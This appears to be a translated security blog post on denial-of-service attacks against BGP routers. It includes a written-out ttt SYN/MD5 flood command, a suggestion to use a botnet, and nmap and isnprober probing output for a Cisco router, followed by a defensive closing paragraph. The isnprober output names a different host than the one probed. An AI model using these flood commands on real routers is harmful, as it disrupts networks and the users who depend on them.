"Blind" DoS attacks on BGP routers.
We will call blind attacks those that do not require any additional knowledge other than the IP address of the BGP router. The simplest scenario for such a DoS attack is a SYN flood on TCP port 179. To implement such an attack on an industrial router, you need to use several dozen computers, or better yet, a botnet.
A more interesting way to "flood" a BGP target router using MD5 authentication is to use SYN TCP packets with MD5 signatures. This attack allows you to add computational load to MD5 processing by the attacked router.
Such an attack is easy to carry out using the ttt utility with the md5 option. To optimize flooding, multiple ttt instances should be running on several dozen machines.
Here is an example of using the ttt utility:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
Speaking of Cisco Systems equipment, mention should be made of the possibility of implementing attacks on the overflow of the TCP/IP stack of IOS. Vulnerability scanners such as Nmap, hping2, and isnprober can be used to identify such vulnerabilities.
Here is an example for a Cisco 2600 router:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
In general, the BGP version 4 routing protocol is an integral part of the modern Internet, and, accordingly, problems in the operation of this protocol will certainly affect the functioning of the global network. Therefore, if the duties of the system administrator include the maintenance of routers working with BGP (as a rule, these are provider companies), then it is necessary to take possible threats seriously and take measures to protect against them in advance.
Oleg Petukhov, lawyer in the field of international law and personal data protection, information security specialist security, protection of information and personal data.
Telegram channel: https://t.me/protectioninformation
Telegram Group: https://t.me/informationprotection1
Website: https://legascom.ru
Email: online@legascom.ru
#informationprotection #informationsecurity
